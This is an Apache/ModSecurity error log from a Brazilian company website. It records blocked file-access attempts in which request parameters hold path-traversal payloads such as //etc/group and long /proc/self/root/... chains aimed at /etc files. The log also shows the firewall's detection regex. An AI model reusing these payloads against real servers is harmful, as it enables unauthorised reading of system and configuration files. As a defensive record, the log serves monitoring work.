[Fri Mar 20 10:42:20.245789 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:41704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OvDJ3M9BSuKP7CAZE2AAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:42:29.951594 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.19:43684] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OxPXLqtnMIWvjpaK9WwAAApA"]
[Fri Mar 20 10:42:34.347157 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.66:43740] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1OyhCii7xarUs8iHaMywAAAg0"]
[Fri Mar 20 10:42:52.625022 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.3:44792] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1O3BCii7xarUs8iHaM5wAAAhI"]
[Fri Mar 20 10:42:54.098161 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:38252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1O3ta6ubjKNq_cu4b8NQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:43:04.472277 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:38892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1O6F1pVZ5mVmJwsFNSAQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:43:08.003741 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.92:45410] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1O7OoXxyEfFpUF8f-ipwAAAUQ"]
[Fri Mar 20 10:43:11.874468 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.47:45720] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1O7vHIg5MgXLBnicMYkwAAAdM"]
[Fri Mar 20 10:43:14.495363 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.90:45730] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1O8vqxLDW4GITHUkQLzwAAAQE"]
[Fri Mar 20 10:43:14.515343 2026] [:error] [pid 7235:tid 140411574073088] [client 57.141.18.1:45778] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1O8fqxLDW4GITHUkQLywAAARQ"]
[Fri Mar 20 10:43:18.265048 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:35438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1O8xCii7xarUs8iHaM_gAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:43:18.307408 2026] [:error] [pid 9818:tid 140411733534464] [client 57.141.18.93:45926] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1O9V1pVZ5mVmJwsFNSBQAAAEE"]
[Fri Mar 20 10:43:20.935809 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.71:46090] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1O-Na6ubjKNq_cu4b8SgAAA0c"]
[Fri Mar 20 10:43:22.463043 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:43398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1O-l1pVZ5mVmJwsFNSDQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:43:25.039477 2026] [:error] [pid 11642:tid 140411616036608] [client 57.141.18.6:46380] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1O_bninkcc-iUj5AqAHgAAA48"]
[Fri Mar 20 10:43:29.641920 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 57.141.18.42:46540] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:43:36.535649 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:43410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1PCDJ3M9BSuKP7CAZFhwAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:43:51.373107 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.118:47362] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1PF_qxLDW4GITHUkQL4AAAARE"]
[Fri Mar 20 10:43:51.379946 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.65:47358] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1PFjJ3M9BSuKP7CAZFpAAAAI8"]
[Fri Mar 20 10:44:02.089792 2026] [mime_magic:error] [pid 21219:tid 140411699963648] (70014)End of file found: [client 57.141.18.3:47838] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:44:04.046990 2026] [:error] [pid 9818:tid 140411590858496] [client 216.73.216.191:47886] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1PI11pVZ5mVmJwsFNSIQAAAFI"]
[Fri Mar 20 10:44:05.803762 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:47508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1PJfHIg5MgXLBnicMYzQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:44:14.785550 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.228.61:36458] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1PLvHIg5MgXLBnicMY0gAAAck"]
[Fri Mar 20 10:44:22.712245 2026] [mime_magic:error] [pid 10189:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:49188] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:44:27.913786 2026] [mime_magic:error] [pid 9818:tid 140411641214720] (70014)End of file found: [client 57.141.18.111:49492] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:44:31.236906 2026] [mime_magic:error] [pid 9818:tid 140411741927168] (70014)End of file found: [client 57.141.18.61:49664] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:44:47.144219 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:41706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1PTzJ3M9BSuKP7CAZGRAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:44:48.583164 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.9:50450] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1PUDJ3M9BSuKP7CAZGSgAAAI0"]
[Fri Mar 20 10:44:49.736495 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:43922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1PUQF0L0L-SsrnPo6LwwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:45:01.891755 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.48:51048] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1PXfHIg5MgXLBnicMZAAAAAcg"]
[Fri Mar 20 10:45:02.942866 2026] [mime_magic:error] [pid 31215:tid 140411733534464] (70014)End of file found: [client 57.141.18.61:51116] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
